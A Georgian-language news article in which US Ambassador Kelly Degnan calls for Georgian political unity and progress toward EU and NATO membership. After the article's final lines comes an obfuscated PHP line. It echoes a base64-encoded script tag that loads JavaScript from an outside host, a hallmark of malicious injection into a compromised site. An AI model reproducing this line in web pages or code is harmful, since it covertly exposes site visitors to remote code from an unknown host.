celsiusi
ავერსი საქკაბელი
ახლა არის ერთიანობის, მომავალზე ფოკუსირების დრო, გვერდზე უნდა გადაიდოს თავდასხმები და იმუშაოთ ერთად ევროატლანტიკურ ოჯახში საქართველოს მომავლისთვის, – ამის შესახებ ჟურნალისტებს საქართველოში აშშ-ის ელჩმა, კელი დეგნანმა განუცხადა.
 
კელი დეგნანის თქმით, ​აშშ-ი არის საქართველოს ევროატლანტიკური ინტეგრაციის აქტიური მხარდამჭერი ბოლო 30 წლის განმავლობაში.
 
„ჩვენ აქტიურად ვადევნებთ თვალს საქართველოს, როგორც ევროკავშირის, ასევე ნატო-ს წევრობის საკითხს. ეს არის უზარმაზარი შესაძლებლობა საქართველოსთვის, რომ გააკეთოს რეალური პროგრესი რეფორმებში, რომელზეც ყველა პოლიტიკური მხარე თანხმდება, რომ აუცილებელია საქართველოს მომავლისთვის ევროკავშირში და ნატო-ში გაწევრიანება. ეს არის შესანიშნავი შესაძლებლობა საქართველოსთვის. მე მინდა, ხაზი გავუსვა, რომ ახლა არის ერთიანობის დრო, ახლა არის საქართველოს მომავალზე ფოკუსირების დრო, რომ გვერდზე იყოს გადადებული თავდასხმები, რაც არის განხეთქილების მომტანი და იწვევს პოლარიზაციას, რომ იფიქრონ, სად მიდის ეს ქვეყანა და რომ იმუშაონ ერთად საქართველოს მომავლისთვის ევროატლანტიკურ ოჯახში. დარწმუნებული ვარ, რომ საქართველო იქ იქნება და ახლა არის დრო რეალური პროგრესის მისაღწევად. ჩვენ გვჯერა საქართველოს ევროატლანტიკური მომავლის, მაგრამ ეს დამოკიდებულია ქართველებზე, რომ იმუშაონ. ეს ძალიან რთული საქმეა, მაგრამ თქვენ შეგიძლიათ ამის გაკეთება. გვჯერა თქვენი. ჩვენ გვსურს, ვიხილოთ თქვენი ერთობა, რომ ეს ერთად გააკეთოთ“, – განაცხადა კელი დეგნანმა.
 
 
868
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");